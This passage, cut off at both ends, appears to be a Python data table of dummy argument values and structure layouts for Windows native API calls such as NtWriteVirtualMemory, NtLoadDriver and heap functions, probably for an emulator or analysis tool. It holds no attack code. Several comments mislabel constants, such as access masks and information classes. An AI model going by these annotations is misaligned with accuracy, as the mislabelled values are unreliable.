pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0020" } ], "structures": {} }, "RtlSetEnvironmentVariable": { "ntFunc": "RtlSetEnvironmentVariable", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to UNICODE_STRING VariableValue (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct129", "structureValueExpectations": "UNICODE_STRING structure describing the value to set.", "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to UNICODE_STRING VariableName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct130", "structureValueExpectations": "UNICODE_STRING structure describing the variable name.", "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to environment block (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0060" } ], "structures": { "struct129": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Length in bytes of string" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Maximum length in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd00d0", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] }, "struct130": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x000c", "fieldComment": "Length in bytes of string" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Maximum length in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd00e0", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] } } }, "LdrGetDllHandle": { "ntFunc": "LdrGetDllHandle", "pushes": [ { "value": "0xbadd0070", "additionalComment": "Pointer to HMODULE (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0080", "additionalComment": "Pointer to UNICODE_STRING ModuleFileName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct131", "structureValueExpectations": "UNICODE_STRING structure describing the DLL name.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Unused parameter, typically None", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Pointer to search path (PWSTR), typically None", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct131": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0014", "fieldComment": "Length in bytes of string" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Maximum length in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd00f0", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] } } }, "LdrGetProcedureAddress": { "ntFunc": "LdrGetProcedureAddress", "pushes": [ { "value": "0xbadd0090", "additionalComment": "Pointer to PVOID FunctionAddress (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000000", "additionalComment": "Ordinal, typically 0 if using FunctionName", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00a0", "additionalComment": "Pointer to ANSI_STRING FunctionName (dummy pointer)", "structurePointer": "ANSI_STRING", "structureRef": "struct132", "structureValueExpectations": "ANSI_STRING structure describing the function name.", "pointedValue": None }, { "value": "0x77770000", "additionalComment": "ModuleHandle (dummy HMODULE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct132": { "type": "ANSI_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0008", "fieldComment": "Length in bytes of string" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Maximum length in bytes" }, { "fieldName": "Buffer", "fieldType": "PCHAR", "fieldValue": "0xbadd0100", "fieldComment": "Pointer to ANSI string buffer (dummy pointer)" } ] } } }, "LdrLoadDll": { "ntFunc": "LdrLoadDll", "pushes": [ { "value": "0xbadd00b0", "additionalComment": "Pointer to HMODULE ModuleHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd00c0", "additionalComment": "Pointer to UNICODE_STRING ModuleFileName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct133", "structureValueExpectations": "UNICODE_STRING structure describing the DLL name.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Flags, typically 0", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PathToFile (PWCHAR), typically None", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct133": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0012", "fieldComment": "Length in bytes of string" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Maximum length in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0110", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] } } }, "LdrQueryProcessModuleInformation": { "ntFunc": "LdrQueryProcessModuleInformation", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG RequiredSize (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00001000" }, { "value": "0x00002000", "additionalComment": "ULONG BufferSize (8 KB typical buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to SYSTEM_MODULE_INFORMATION buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "LdrShutdownProcess": { "ntFunc": "LdrShutdownProcess", "pushes": [], "structures": {} }, "LdrShutdownThread": { "ntFunc": "LdrShutdownThread", "pushes": [], "structures": {} }, "LdrUnloadDll": { "ntFunc": "LdrUnloadDll", "pushes": [ { "value": "0x10000000", "additionalComment": "HANDLE ModuleHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtLoadDriver": { "ntFunc": "NtLoadDriver", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to UNICODE_STRING DriverServiceName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct134", "structureValueExpectations": "UNICODE_STRING structure containing registry path to driver service.", "pointedValue": None } ], "structures": { "struct134": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0030", "fieldComment": "Length in bytes of the string" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0032", "fieldComment": "Maximum length in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0030", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] } } }, "NtUnloadDriver": { "ntFunc": "NtUnloadDriver", "pushes": [ { "value": "0x00000000", "additionalComment": "None (no driver service name provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlImageNtHeader": { "ntFunc": "RtlImageNtHeader", "pushes": [ { "value": "0x00000000", "additionalComment": "None (no module address provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlImageRvaToVa": { "ntFunc": "RtlImageRvaToVa", "pushes": [ { "value": "0x00000000", "additionalComment": "None (no IMAGE_SECTION_HEADER pointer provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Rva = 0 (no relative virtual address provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None (no module base address provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None (no IMAGE_NT_HEADERS pointer provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtFlushWriteBuffer": { "ntFunc": "NtFlushWriteBuffer", "pushes": [], "structures": {} }, "NtShutdownSystem": { "ntFunc": "NtShutdownSystem", "pushes": [ { "value": "0x00000000", "additionalComment": "ShutdownAction = 0 (ShutdownNoReboot)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQueryDefaultLocale": { "ntFunc": "NtQueryDefaultLocale", "pushes": [ { "value": "0x00000409", "additionalComment": "PLCID DefaultLocaleId (pointer to US English LCID, 0x409)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000409" }, { "value": "0x00000001", "additionalComment": "BOOLEAN UserProfile (TRUE, query user profile locale)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetDefaultLocale": { "ntFunc": "NtSetDefaultLocale", "pushes": [ { "value": "0x00000409", "additionalComment": "LCID DefaultLocaleId (US English)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "BOOLEAN UserProfile (TRUE, set user profile locale)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlAllocateHeap": { "ntFunc": "RtlAllocateHeap", "pushes": [ { "value": "0x00001000", "additionalComment": "ULONG Size (4096 bytes, typical page size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000008", "additionalComment": "ULONG Flags (HEAP_ZERO_MEMORY)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "PVOID HeapHandle (dummy heap handle pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00ee0000" } ], "structures": {} }, "RtlCompactHeap": { "ntFunc": "RtlCompactHeap", "pushes": [ { "value": "0x00000000", "additionalComment": "ULONG Flags (no flags, default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "HANDLE HeapHandle (dummy heap handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlCreateHeap": { "ntFunc": "RtlCreateHeap", "pushes": [ { "value": "0xbadd0020", "additionalComment": "PRTL_HEAP_DEFINITION RtlHeapParams (dummy pointer, None for default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000001", "additionalComment": "BOOLEAN Lock (TRUE, serialized heap)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00001000", "additionalComment": "ULONG Commit (commit 4096 bytes initially)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00100000", "additionalComment": "ULONG Reserve (reserve 1MB for heap)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID Base (None, let system choose base address)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "ULONG Flags (HEAP_GROWABLE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlDestroyHeap": { "ntFunc": "RtlDestroyHeap", "pushes": [ { "value": "0x00000000", "additionalComment": "HeapHandle (None, destroys default process heap)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlEnumProcessHeaps": { "ntFunc": "RtlEnumProcessHeaps", "pushes": [ { "value": "0x00000000", "additionalComment": "Param (None, no user parameter passed to callback)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HeapEnumerationRoutine (None, no callback routine)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlFreeHeap": { "ntFunc": "RtlFreeHeap", "pushes": [ { "value": "0x00000000", "additionalComment": "MemoryPointer (None, no memory to free)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Flags (0, no special flags)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HeapHandle (None, default process heap)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlGetProcessHeaps": { "ntFunc": "RtlGetProcessHeaps", "pushes": [ { "value": "0x00000000", "additionalComment": "HeapArray (None, caller wants heap count only)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000010", "additionalComment": "MaxNumberOfHeaps (16, typical small process)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlLockHeap": { "ntFunc": "RtlLockHeap", "pushes": [ { "value": "0x00000000", "additionalComment": "HeapHandle (None, default process heap)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlProtectHeap": { "ntFunc": "RtlProtectHeap", "pushes": [ { "value": "0x00000001", "additionalComment": "BOOLEAN Protect (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "PVOID HeapHandle (dummy heap handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlReAllocateHeap": { "ntFunc": "RtlReAllocateHeap", "pushes": [ { "value": "0x00002000", "additionalComment": "ULONG Size (8 KB)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "PVOID MemoryPointer (dummy pointer to allocated memory)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000008", "additionalComment": "ULONG Flags (HEAP_ZERO_MEMORY)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "PVOID HeapHandle (dummy heap handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlSizeHeap": { "ntFunc": "RtlSizeHeap", "pushes": [ { "value": "0xbadd0030", "additionalComment": "PVOID MemoryPointer (dummy pointer to allocated memory)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG Flags (default, 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "PVOID HeapHandle (dummy heap handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlUnlockHeap": { "ntFunc": "RtlUnlockHeap", "pushes": [ { "value": "0xbadd0050", "additionalComment": "PVOID HeapHandle (dummy heap handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlValidateHeap": { "ntFunc": "RtlValidateHeap", "pushes": [ { "value": "0xbadd0060", "additionalComment": "PVOID AddressToValidate (dummy pointer to memory block)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG Flags (default, 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "PVOID HeapHandle (dummy heap handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlValidateProcessHeaps": { "ntFunc": "RtlValidateProcessHeaps", "pushes": [], "structures": {} }, "RtlWalkHeap": { "ntFunc": "RtlWalkHeap", "pushes": [ { "value": "0x00000000", "additionalComment": "LPPROCESS_HEAP_ENTRY ProcessHeapEntry (None, typical for initial call)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID HeapHandle (None, means use process default heap)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAllocateVirtualMemory": { "ntFunc": "NtAllocateVirtualMemory", "pushes": [ { "value": "0x00000040", "additionalComment": "ULONG Protect (PAGE_EXECUTE_READWRITE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00001000", "additionalComment": "ULONG AllocationType (MEM_COMMIT)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "PSIZE_T RegionSize (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00002000" }, { "value": "0x00000000", "additionalComment": "ULONG_PTR ZeroBits (0, typical for user mode)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "PVOID BaseAddress (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00400000" }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle, current process)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtFlushVirtualMemory": { "ntFunc": "NtFlushVirtualMemory", "pushes": [ { "value": "0xbadd0020", "additionalComment": "PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct135", "structureValueExpectations": "Status and Information fields.", "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "PULONG NumberOfBytesToFlush (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00001000" }, { "value": "0x00400000", "additionalComment": "PVOID BaseAddress (typical heap base address)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle, current process)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct135": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "Operation status (initialized to 0)" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "Additional info (initialized to 0)" } ] } } }, "NtFreeVirtualMemory": { "ntFunc": "NtFreeVirtualMemory", "pushes": [ { "value": "0x00008000", "additionalComment": "ULONG FreeType (MEM_RELEASE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "PSIZE_T RegionSize (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00002000" }, { "value": "0xbadd0050", "additionalComment": "PVOID BaseAddress (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00400000" }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle, current process)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtLockVirtualMemory": { "ntFunc": "NtLockVirtualMemory", "pushes": [ { "value": "0x00000001", "additionalComment": "LockOption (VM_LOCK_1, example value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG NumberOfBytesToLock (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00002000" }, { "value": "0x00400000", "additionalComment": "BaseAddress (typical image base)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtProtectVirtualMemory": { "ntFunc": "NtProtectVirtualMemory", "pushes": [ { "value": "0xbadd0010", "additionalComment": "Pointer to ULONG OldAccessProtection (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000004" }, { "value": "0x00000020", "additionalComment": "NewAccessProtection (PAGE_EXECUTE_READ, example value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to ULONG NumberOfBytesToProtect (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00001000" }, { "value": "0x00400000", "additionalComment": "BaseAddress (typical image base)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQueryVirtualMemory": { "ntFunc": "NtQueryVirtualMemory", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to SIZE_T ReturnLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000040" }, { "value": "0x00000040", "additionalComment": "MemoryInformationLength (example: 64 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to MEMORY_BASIC_INFORMATION (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "MemoryInformationClass (MemoryBasicInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00400000", "additionalComment": "BaseAddress (typical image base)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtReadVirtualMemory": { "ntFunc": "NtReadVirtualMemory", "pushes": [ { "value": "0xbadd0050", "additionalComment": "Pointer to ULONG NumberOfBytesRead (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00001000" }, { "value": "0x00001000", "additionalComment": "NumberOfBytesToRead (4096 bytes, typical page size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to Buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00400000", "additionalComment": "BaseAddress (typical image base)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtUnlockVirtualMemory": { "ntFunc": "NtUnlockVirtualMemory", "pushes": [ { "value": "0x00000001", "additionalComment": "LockType (VM_UNLOCK_1, example value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to ULONG NumberOfBytesToUnlock (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00002000" }, { "value": "0x00400000", "additionalComment": "BaseAddress (typical image base)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtWriteVirtualMemory": { "ntFunc": "NtWriteVirtualMemory", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG NumberOfBytesWritten (dummy pointer, typically receives number of bytes written)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0x00000010", "additionalComment": "ULONG NumberOfBytesToWrite (16 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to buffer to write (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x41414141" }, { "value": "0x00405000", "additionalComment": "PVOID BaseAddress (target address in remote process)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQuerySecurityObject": { "ntFunc": "NtQuerySecurityObject", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to ULONG LengthNeeded (dummy pointer, receives required length)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000100" }, { "value": "0x00000100", "additionalComment": "ULONG Length (256 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to SECURITY_DESCRIPTOR buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0x00000001", "additionalComment": "SECURITY_INFORMATION (OWNER_SECURITY_INFORMATION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE Handle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetSecurityObject": { "ntFunc": "NtSetSecurityObject", "pushes": [ { "value": "0xbadd0040", "additionalComment": "Pointer to SECURITY_DESCRIPTOR (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0x00000004", "additionalComment": "SECURITY_INFORMATION (DACL_SECURITY_INFORMATION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE Handle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtDuplicateObject": { "ntFunc": "NtDuplicateObject", "pushes": [ { "value": "0x00000002", "additionalComment": "ULONG Options (DUPLICATE_SAME_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "BOOLEAN InheritHandle (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x001F0001", "additionalComment": "ACCESS_MASK DesiredAccess (SYNCHRONIZE | PROCESS_DUP_HANDLE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to HANDLE TargetHandle (dummy pointer, receives duplicated handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000555", "additionalComment": "HANDLE TargetProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to HANDLE SourceHandle (dummy pointer, points to handle to duplicate)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000444" }, { "value": "0x00000444", "additionalComment": "HANDLE SourceProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtMakeTemporaryObject": { "ntFunc": "NtMakeTemporaryObject", "pushes": [ { "value": "0x00000444", "additionalComment": "HANDLE ObjectHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQueryObject": { "ntFunc": "NtQueryObject", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG ReturnLength (dummy pointer, optional, can be None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000040" }, { "value": "0x00001000", "additionalComment": "ULONG ObjectInformationLength (typical buffer size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to buffer for ObjectInformation (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ObjectInformationClass (ObjectBasicInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE Handle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetInformationObject": { "ntFunc": "NtSetInformationObject", "pushes": [ { "value": "0x00000018", "additionalComment": "ULONG Length (typical structure size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to ObjectInformation (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "ObjectInformationClass (ObjectNameInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000445", "additionalComment": "HANDLE ObjectHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSignalAndWaitForSingleObject": { 